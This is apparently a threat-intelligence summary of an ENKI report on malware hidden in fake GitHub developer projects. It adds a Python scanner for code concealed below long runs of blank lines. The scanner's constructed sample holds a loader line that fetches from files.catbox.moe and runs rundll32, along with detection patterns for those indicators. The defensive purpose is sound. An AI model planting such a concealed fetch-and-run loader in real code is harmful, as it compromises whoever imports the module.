An attacker, disguised as a job seeker, distributing malware on GitHub

2025-06-03 ENKI

https://www.enki.co.kr/en/media-center/tech-blog/an-attacker-disguised-as-a-job-seeker-distributing-malware-on-github


ENKI analyzed GitHub repositories where an actor posing as a full-stack and blockchain developer hid malicious scripts inside apparently legitimate projects. In the Ly_AutoPayBot repository, malicious code was concealed far below the visible logger.ts content and executed whenever the module was imported, downloading a disguised DLL from Catbox and launching it through rundll32. The DLL backdoor created multiple threads, used IOCP-based HTTP POST communication with its C&C server, generated an infected-host identifier from the volume GUID path, and protected C&C data and internal strings with Base64 and MT19937-based routines. The excerpt explicitly notes that North Korean IT workers have used fake LinkedIn and GitHub developer profiles for revenue and information theft, but it does not claim the analyzed GitHub actor is North Korean or Lazarus-linked.
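A defender-side check for the concealment pattern summarised above (code placed far below a file's visible contents, with a Catbox download and a rundll32-based loader), as an added example that is not from the ENKI report or the analysed repository: a Python scanner run over a constructed logger.ts-like file. That the hiding is done with a long run of blank lines, the gap threshold, and the sample loader lines are assumptions for this example.

```python
import re

# Constructed sample standing in for a logger.ts whose visible, legitimate body
# is followed by a long run of blank lines and then a hidden loader. The
# indicator strings (rundll32, files.catbox.moe) come from the report; the
# exact concealment layout and loader code are assumptions for this example.
SAMPLE_LOGGER_TS = (
    "export function log(msg: string) {\n"
    "  console.log(`[bot] ${msg}`);\n"
    "}\n"
    + "\n" * 300
    + "const { execSync } = require('child_process');\n"
    "fetch('https://files.catbox.moe/PLACEHOLDER').then(() => execSync('rundll32 ...'));\n"
)

# Loader indicators worth flagging in a JS/TS source file.
LOADER_PATTERNS = [re.compile(p, re.I) for p in
                   (r"rundll32", r"files\.catbox\.moe", r"child_process")]

def find_hidden_code(text, min_gap=100):
    """Return (gap_start_line, gap_length, hidden_lines) for the longest run of
    at least min_gap blank lines that is followed by further code, else None."""
    lines = text.split("\n")
    best, run_start, run_len = None, None, 0
    for i, line in enumerate(lines):
        if line.strip() == "":
            run_start = i if run_start is None else run_start
            run_len += 1
            continue
        if run_start is not None and run_len >= min_gap:
            if best is None or run_len > best[1]:
                hidden = [l for l in lines[i:] if l.strip()]
                best = (run_start + 1, run_len, hidden)   # 1-based line number
        run_start, run_len = None, 0
    return best

def loader_indicators(lines):
    """Return the set of regex patterns that match anywhere in the given lines."""
    return {p.pattern for p in LOADER_PATTERNS if any(p.search(l) for l in lines)}

def scan(text, min_gap=100):
    """Flag a file when code sits past a large blank gap; report loader indicators."""
    found = find_hidden_code(text, min_gap)
    if found is None:
        return {"hidden": False, "indicators": set()}
    start, gap, hidden = found
    return {"hidden": True, "gap_start_line": start, "gap_length": gap,
            "indicators": loader_indicators(hidden)}

print(scan(SAMPLE_LOGGER_TS))
```

The gap check catches the placement trick on its own, so a file flagged by it deserves review even when none of the loader indicators match.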

Indicators of Compromise

